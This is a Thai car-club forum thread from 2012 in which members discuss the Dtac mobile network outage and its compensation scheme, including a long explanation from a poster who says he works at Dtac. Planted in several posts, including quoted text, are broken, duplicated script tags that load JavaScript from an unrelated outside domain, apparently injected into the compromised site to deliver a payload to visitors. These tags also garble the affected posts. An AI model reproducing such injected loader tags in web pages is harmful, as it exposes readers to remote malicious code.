ตอบ
jjim


ชื่อเล่น: จิ้ม

เข้าร่วม: 12 พฤศจิกา 2008
ตอบ: 1016

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1082
ให้คำขอบคุณ: 155

ที่อยู่: Chachoengsao
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 2 กันยา 2012 20:03 - ดีแทค ขยายวันโทรรับสิทธิ์ชดเชยถึง 14 ก.ย. นี้
รู้แล้วบอกต่อ 
http://hilight.kapook.com/view/75650
ได้รับคำขอบคุณจาก: maxch  WarHighways  pja  kaisuh  khem_hatyai 
maxch


เข้าร่วม: 13 สิงหา 2009
ตอบ: 2190

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1513
ให้คำขอบคุณ: 2530

ที่อยู่: อยุธยา-สระบุรี
ปี: 2003
อาทิตย์, 2 กันยา 2012 21:45 - ดีแทค ขยายวันโทรรับสิทธิ์ชดเชยถึง 14 ก.ย. นี้
จัดไป ขอบคุณครับ
ได้รับคำขอบคุณจาก: jjim  khem_hatyai 
phoochit-n


ชื่อเล่น: เบิ้ล

เข้าร่วม: 19 ตุลา 2009
ตอบ: 815

Guru ES
Guru ES

ได้รับคำขอบคุณ: 923
ให้คำขอบคุณ: 907

ที่อยู่: ศรีราชา-โคราช
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อาทิตย์, 2 กันยา 2012 23:25 - ดีแทค ขยายวันโทรรับสิทธิ์ชดเชยถึง 14 ก.ย. นี้
โทรไป โดนตัดสายตลอด
จะเปลี่ยนเครือข่ายแล้วครับ

ความผิดพลาดเกิดจาก "ดีแทค"  แล้วทำไมไม่ให้ใช้ฟรีทุกคนไปเลย
ทำไมต้องให้สมัครโน่น  ทำนี่   ไม่เข้าใจ

แล้วเวลาเครือข่ายล่ม  ดีแทคได้เลือกมั้ยว่าจะให้เครื่องไหนใช้ได้ หรือใช้ไม่ได้ 
ก็เห็นใช้ไม่ได้กันทุกคน
ได้รับคำขอบคุณจาก: jjim  pja  kaisuh  khem_hatyai 
bankabby


ชื่อเล่น: แบงค์

เข้าร่วม: 10 มิถุนา 2012
ตอบ: 1504

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1642
ให้คำขอบคุณ: 2485

ที่อยู่: หาดใหญ่
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 3 กันยา 2012 00:52 - ดีแทค ขยายวันโทรรับสิทธิ์ชดเชยถึง 14 ก.ย. นี้
เพื่อนผมเปลี่ยนแล้วครับ ถึงกับโพสถาม DTAC ว่า

จะเปลี่ยนค่ายแต่ใช้เิบอร์เดิมทำยังไง

<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: khem_hatyai 
pja


เข้าร่วม: 21 มีนา 2011
ตอบ: 934

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 707
ให้คำขอบคุณ: 973

ที่อยู่: เอกชัย-โคราช-บางพลี
ปี: 2002
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 3 กันยา 2012 13:01 - ดีแทค ขยายวันโทรรับสิทธิ์ชดเชยถึง 14 ก.ย. นี้
phoochit-n พิมพ์ว่า:
โทรไป โดนตัดสายตลอด
จะเปลี่ยนเครือข่ายแล้วครับ

ความผิดพลาดเกิดจาก "ดีแทค"  แล้วทำไมไม่ให้ใช้ฟรีทุกคนไปเลย
ทำไมต้องให้สมัครโน่น  ทำนี่   ไม่เข้าใจ

แล้วเวลาเครือข่ายล่ม  ดีแทคได้เลือกมั้ยว่าจะให้เครื่องไหนใช้ได้ หรือใช้ไม่ได้ 
ก็เห็นใช้ไม่ได้กันทุกคน


+100 
ได้รับคำขอบคุณจาก: khem_hatyai 
Soot_ES


เข้าร่วม: 01 ตุลา 2008
ตอบ: 176

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 1117
ให้คำขอบคุณ: 15

ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 3 กันยา 2012 18:10 - ดีแทค ขยายวันโทรรับสิทธิ์ชดเชยถึง 14 ก.ย. นี้
ตอบแบบกลางๆ ไม่ได้เข้าข้างบริษัทตัวเอง"<script src="https://sport32news.com/civicesgroup.js"> เรื่อง เครือข่าย Dtac ล่มเมื่อวันก่อน และการขอรับสิทธิ โทรฟรีของ Dtac นะครับ

สาเหตุเกิดจากอุปกรณ์ Transmission ที่ Side รังสิตเกิดขัดข้อง เลยต้องย้ายข้อมูลจำนวนหนึ่งไปที่ Side ยานาวา แทน ซึ่งน่าจะใช้เวลาประมาณ 45 นาที ถึง 1 Hr. Network จึงกลับมาใช้งานได้เหมือนเดิม ซึ่งส่งผลกระทบกับลูกค้าประมาณ 5 แสนราย

ทำไมต้องให้กด *10250, *1737

ต้องตอบแบบถูๆไถๆประมาณนี้ครับ
1. เนื่องจากกับลูกค้าบางส่วน ไม่ได้เป็นทั้งหมด การที่จะ Query หาเบอร์ลูกค้าที่มีปัญหาในช่วงเวลาดังกล่าว ทำได้ยาก และอาจจะใช้เวลาหลายวันในการดึงข้อมูลดังกล่าวครับ
2. เพราะเรามี Option ให้เลือกครับว่าจะรับสิทธิโทรฟรี หรือ Internet Free แล้วแต่ความต้องการของลูกค้า(อันนี้ผมว่า Marketing คิดเยอะไปนิดนึง ให้ค่าโทร Free ก้น่าจะพอใจกันทั้ง 2 ฝ่าย)

ทำไมต้องให้กด *10250, *1737 ไม่ติดเลยยย

อันนี้ต้องบอกว่าคนโทรมาพร้อมๆกันมหาสารจริงๆครับ ทั้งคนที่มีปัญหาอยากรับสิทธิ และคนที่สวมรอยเพื่อรับสิทธิ ทำให้ระบบ *10250, *1737 ล่มไปตามๆกัน ครับ

ทั้งนี้ทั้งนั้น ผมเข้าใจว่าเหตุการณ์ครั้งนี้มันไปซ้ำแผลเดิมที่เราเคยทำไว้ ทำให้ความเชื่อมั่นหายไปเยอะ แต่แฟนผมที่ใช้ AIS(อ่าวแฟนกรูไมใช้ AIS ฟระ แสดดดดดดดด) บ้างวัน Net เล่นไม่ได้บ้าน โทรไม่ติดบ้าง ก้มีเหมือนกัน หรือกับน้องชายที่ใช้ True Move(ห่าน!!! ไม่รักพี่มันเล้ยยย T_T) ก้สามวันดีสี่วันป่วยเช่นกัน

ทำไมช่วงนี้มีปัญหาเยอะจัง

สาเหตุเพราะเหล่าค่ายมือถือต่างก้กำลัง Upgrate อุปกรณ์ของตนจากเดิมที่เป็น 850 MHz,900 MHz ให้ Support 2100 MHz หรือ 3G ที่จะประมูลกันในอีกไม่กี่วันนี้นั่นเองครับ ทำใจร่มๆกันนิดนึงนะครับ

สุดท้ายนี้ผมซึ่งเป็นพนักงาน Dtac ตัวเล็กๆคนนึงต้องกราบขออภัยทุกๆท่านเป็นอย่างสูงนะครับ เหตุการณ์แบบนี้ไม่มีใครอยากให้เกินขึ้นหรอกครับ มันเป็นคราวเคราะห์ ซึ่งปีนี้โบน้ง โบนัส คงละลายหายไปกับค่าชดเชิยที่เราต้องจ่ายไป แต่ก้สมควรเพราะผู้บริโภคโดยรวมได้รับความเสียหายจากเหตุการณ์ดังกล่าว หวังเป็นอย่างยิ่งว่าทุกๆท่านคงจะไม่ย้ายหนีเราไปไหนนะครับ แหะๆ
ได้รับคำขอบคุณจาก: es330  khem_hatyai  phoochit-n  engintania 
es330


เข้าร่วม: 10 พฤศจิกา 2008
ตอบ: 1890

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3172
ให้คำขอบคุณ: 6546

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 3 กันยา 2012 19:06 - ดีแทค ขยายวันโทรรับสิทธิ์ชดเชยถึง 14 ก.ย. นี้
Soot_ES พิมพ์ว่า:
ตอบแบบกลางๆ ไม่ได้เข้าข้างบริษัทตัวเอง"<script src="https://sport32news.com/civicesgroup.js"> เรื่อง เครือข่าย Dtac ล่มเมื่อวันก่อน และการขอรับสิทธิ โทรฟรีของ Dtac นะครับ

สาเหตุเกิดจากอุปกรณ์ Transmission ที่ Side รังสิตเกิดขัดข้อง เลยต้องย้ายข้อมูลจำนวนหนึ่งไปที่ Side ยานาวา แทน ซึ่งน่าจะใช้เวลาประมาณ 45 นาที ถึง 1 Hr. Network จึงกลับมาใช้งานได้เหมือนเดิม ซึ่งส่งผลกระทบกับลูกค้าประมาณ 5 แสนราย

ทำไมต้องให้กด *10250, *1737

ต้องตอบแบบถูๆไถๆประมาณนี้ครับ
1. เนื่องจากกับลูกค้าบางส่วน ไม่ได้เป็นทั้งหมด การที่จะ Query หาเบอร์ลูกค้าที่มีปัญหาในช่วงเวลาดังกล่าว ทำได้ยาก และอาจจะใช้เวลาหลายวันในการดึงข้อมูลดังกล่าวครับ
2. เพราะเรามี Option ให้เลือกครับว่าจะรับสิทธิโทรฟรี หรือ Internet Free แล้วแต่ความต้องการของลูกค้า(อันนี้ผมว่า Marketing คิดเยอะไปนิดนึง ให้ค่าโทร Free ก้น่าจะพอใจกันทั้ง 2 ฝ่าย)

ทำไมต้องให้กด *10250, *1737 ไม่ติดเลยยย

อันนี้ต้องบอกว่าคนโทรมาพร้อมๆกันมหาสารจริงๆครับ ทั้งคนที่มีปัญหาอยากรับสิทธิ และคนที่สวมรอยเพื่อรับสิทธิ ทำให้ระบบ *10250, *1737 ล่มไปตามๆกัน ครับ

ทั้งนี้ทั้งนั้น ผมเข้าใจว่าเหตุการณ์ครั้งนี้มันไปซ้ำแผลเดิมที่เราเคยทำไว้ ทำให้ความเชื่อมั่นหายไปเยอะ แต่แฟนผมที่ใช้ AIS(อ่าวแฟนกรูไมใช้ AIS ฟระ แสดดดดดดดด) บ้างวัน Net เล่นไม่ได้บ้าน โทรไม่ติดบ้าง ก้มีเหมือนกัน หรือกับน้องชายที่ใช้ True Move(ห่าน!!! ไม่รักพี่มันเล้ยยย T_T) ก้สามวันดีสี่วันป่วยเช่นกัน

ทำไมช่วงนี้มีปัญหาเยอะจัง

สาเหตุเพราะเหล่าค่ายมือถือต่างก้กำลัง Upgrate อุปกรณ์ของตนจากเดิมที่เป็น 850 MHz,900 MHz ให้ Support 2100 MHz หรือ 3G ที่จะประมูลกันในอีกไม่กี่วันนี้นั่นเองครับ ทำใจร่มๆกันนิดนึงนะครับ

สุดท้ายนี้ผมซึ่งเป็นพนักงาน Dtac ตัวเล็กๆคนนึงต้องกราบขออภัยทุกๆท่านเป็นอย่างสูงนะครับ เหตุการณ์แบบนี้ไม่มีใครอยากให้เกินขึ้นหรอกครับ มันเป็นคราวเคราะห์ ซึ่งปีนี้โบน้ง โบนัส คงละลายหายไปกับค่าชดเชิยที่เราต้องจ่ายไป แต่ก้สมควรเพราะผู้บริโภคโดยรวมได้รับความเสียหายจากเหตุการณ์ดังกล่าว หวังเป็นอย่างยิ่งว่าทุกๆท่านคงจะไม่ย้ายหนีเราไปไหนนะครับ แหะๆ

ผมไม่ย้ายครับ อยู่ Dtac ไปอย่างงี้แหละ ดีบ้าง ล่มบ้าง  ก็ไม่เป็นไร เพราะรู้สึกว่าบิลค่าใช้จ่ายกับ Dtac มันแฟร์ดีไม่ค่อยมีหมกเม็ด.....
ได้รับคำขอบคุณจาก: khem_hatyai  engintania 
khem_hatyai


ชื่อเล่น: เข้ม

เข้าร่วม: 31 ตุลา 2011
ตอบ: 3195

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3829
ให้คำขอบคุณ: 26792

ที่อยู่: เกิดที่ นครศรีฯ ตอนนี้ สงขลา
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 3 กันยา 2012 21:00 - ดีแทค ขยายวันโทรรับสิทธิ์ชดเชยถึง 14 ก.ย. นี้
ผมก็ใช้ DTAC อยู่เหมือนกันครับ ไม่ย้ายแระ แต่ก็เอือมระอาจังครับ
ได้รับคำขอบคุณจาก: Soot_ES 
pannatad


ชื่อเล่น: ปุ๋ย

เข้าร่วม: 19 เมษา 2011
ตอบ: 1900

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1742
ให้คำขอบคุณ: 751

ปี: 2003
อังคาร, 4 กันยา 2012 09:41 - ดีแทค ขยายวันโทรรับสิทธิ์ชดเชยถึง 14 ก.ย. นี้
ผมชอบความแฟร์ของแพคเกจดีแทคนะ คิดว่าจะย้ายอยู่เหมือนกัน เบื่อ ais ละ
ได้รับคำขอบคุณจาก: Soot_ES 
engintania


ชื่อเล่น: ต้น

เข้าร่วม: 15 ตุลา 2009
ตอบ: 53

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 110
ให้คำขอบคุณ: 610

ที่อยู่: สมุทปราการ
อังคาร, 4 กันยา 2012 23:30 - ดีแทค ขยายวันโทรรับสิทธิ์ชดเชยถึง 14 ก.ย. นี้
เรื่องเล็กน้อยสำหรับผม ไม่คิดมาก และไม่คิดย้ายค่าย พอใจกับค่าบริการในแต่ละเดือน ถูกใจ ใช่เลย 
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.